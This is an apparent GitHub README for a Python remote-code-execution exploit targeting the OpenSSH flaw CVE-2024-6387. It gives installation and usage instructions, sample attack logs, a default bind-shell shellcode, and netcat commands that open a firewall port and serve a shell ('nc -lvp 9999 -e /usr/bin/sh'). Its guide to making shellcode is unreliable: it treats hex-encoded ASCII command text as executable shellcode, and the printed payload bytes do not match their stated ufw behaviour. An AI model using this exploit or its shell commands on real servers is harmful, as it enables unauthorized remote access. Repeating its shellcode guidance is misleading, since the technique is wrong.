Skip to content

Latest commit

 

History

History
169 lines (157 loc) · 6.77 KB

README.md

File metadata and controls

169 lines (157 loc) · 6.77 KB

CVE-2024-6387 regreSSHion

Proof of concept python script for regreSSHion exploit. Version 0.2.1 build POC regreSSHion-green-banner

Installation

git clone https://github.com/l-urk/CVE-2024-6387.git
cd CVE-2024-6387
pip3 install -r requirements.txt
python3 regreSSHion.py -h

Usage

🔒 CVE-2024-6387 regreSSHion remote code execution vulnerability exploit script

usage: regreSSHion.py [-h] -i IP -p PORT [-t] [-c] [-d] [-r] [-x] [-y] [-z]

🔒 CVE-2024-6387 regreSSHion remote code execution vulnerability exploit script

options:
  -h, --help            show this help message and exit
  -i IP, --ip IP        target SSH server IPv4 ( format: -i 0.0.0.0 )
  -p PORT, --port PORT  target SSH server port number ( format: -p 22 )
  -t, --time            ENABLE TIME displayed on all log output ( format: -t )
  -c, --clear           CLEAR SCREEN before running the exploit ( format: -c )
  -d, --debug           enable see the DEBUG LOGS output on run ( format: -d )
  -r, --repeat          enable to REPEAT EXPLOIT until RCE wins ( format: -r )
  -x, --skipssh         enable this to SKIP SSH HANDSHAKES ( format: -x )
  -y, --skipheap        enable this to SKIP HEAP and parse ( format: -y )
  -z, --skipfinal       enable this to SKIP FINAL ID CHECK ( format: -z )

🔒 Affected OpenSSH Versions: 1.2.2p1 ~ 4.4 and 8.5p1 ~ 9.8

🔒 contact: github.com/l-urk - x.com/l_urkk

To use the script, start python3 with regreSSHion.py

  • Set the ip to the vulnerable SSH server IPv4 address
  • Set the port to the vulnerable SSH server port number
python3 regreSSHion.py --ip 127.0.0.1 --port 22
2024-08-03 22:42:55,944 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:42:55,945 - INFOS - Connection established
2024-08-03 22:42:55,945 - INFOS - Performing SSH handshake...
2024-08-03 22:43:05,014 - INFOS - Received KEX_INIT (5 bytes)
2024-08-03 22:43:05,015 - INFOS - SSH handshake successful.
2024-08-03 22:43:05,015 - INFOS - Preparing heap...
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 1
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 2
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 3
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 4

Let's say you make it all the way here in the script...

2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 3
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 4
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 5
2024-08-03 22:46:45,858 - INFOS - Sent large string
2024-08-03 22:46:45,858 - INFOS - Heap preparation complete.
2024-08-03 22:47:05,879 - INFOS - Estimated parsing time: 0.000056 seconds
2024-08-03 22:47:05,880 - INFOS - Final packet sent successfully.
2024-08-03 22:47:05,880 - INFOS - Verifying exploit success.
2024-08-03 22:47:15,890 - WARN! - No response received for verification.

If it says exploit verification success you have successfully delivered and executed your payload. The script will try a few times to succeed. I would suggest trying this on your own vulnerable SSH server until you get a feel for getting the success message.

2024-08-03 22:47:15,891 - ERROR - Exploitation failed.

Debug mode

  • With debug mode enabled you will get a more verbose output, this will show you the received SSH version string, packet length information, and some other things, pretty much everything that's happening that could possibly be logged.
python3 regreSSHion.py --ip 127.0.0.1 --port 22 --debug

Example Output:

2024-08-03 22:44:53,962 - DEBUG - Logging is set to DEBUG level
2024-08-03 22:44:53,962 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:44:53,963 - INFOS - Connection established
2024-08-03 22:44:53,963 - INFOS - Performing SSH handshake...
2024-08-03 22:44:53,963 - DEBUG - Sent SSH version string.
2024-08-03 22:44:53,963 - DEBUG - Waiting to receive SSH version string
2024-08-03 22:45:03,256 - DEBUG - Received SSH version string: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
2024-08-03 22:45:04,373 - INFOS - Received KEX_INIT (4 bytes)
2024-08-03 22:45:04,373 - INFOS - SSH handshake successful.
2024-08-03 22:45:04,373 - INFOS - Preparing heap...

shellcode payload

The default shellcode uses ufw to open incoming port 9999 and starts a nc listening shell on port 9999

    shellcode = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\x7f\x00\x00\x01\x66\x68\x27\x0f\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x56\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

shellcode payload creation

You can make your own shellcode payload by using an ascii to hex editor, and manually converting it to shellcode. I use this ascii-to-hex website here: https://www.rapidtables.com/convert/number/ascii-to-hex.html

  • Input your desired text for the shellcode.
  • Use the settings "User defined" and "\x" in the input box.
  • Replace all capital X's with lowecase x's
  • Use notepad or another character replacement capable program.
  • Move the last \x from the end to the start of the hex string.
  • Add quotes to both ends for interpretation by the shell.

shellcode payload examples

hello world

hello world
"\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"

printf hello world

printf hello world
"\x70\x72\x69\x6E\x74\x66\x20\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"

make test file

test > test
"\x74\x65\x73\x74\x20\x3E\x20\x74\x65\x73\x74"

Allow incoming connections on port 9999 & open a nc shell on port 9999

ufw allow 9999 && /usr/bin/nc -lvp 9999 -e /usr/bin/sh
"\x75\x66\x77\x20\x61\x6C\x6C\x6F\x77\x20\x39\x39\x39\x39\x20\x26\x26\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x6E\x63\x20\x2D\x6C\x76\x70\x20\x39\x39\x39\x39\x20\x2D\x65\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x73\x68"

send_socket.py

If you want to test out the exection of a shellcode payload you can use the send_socket.py script. Usage:

usage: send_socket.py [-h] [-i IP] [-p PORT] [-s SHELLCODE]

send shellcode to a target socket (ip and port)

options:
  -h, --help            show this help message and exit
  -i IP, --ip IP        target ip address (default: 127.0.0.1)
  -p PORT, --port PORT  target tcp socket port (default: 1111)
  -s SHELLCODE, --shellcode SHELLCODE
                        shellcode hex to send in format: \x00\x00\x00\...etc (default: F13)

Sender:

python3 send_socket.py -i 127.0.0.1 -p 1111

Listener:

  • raw text interpretation
nc -lvp 1111
  • shell execution
nc -lvp 1111 -e /usr/bin/bash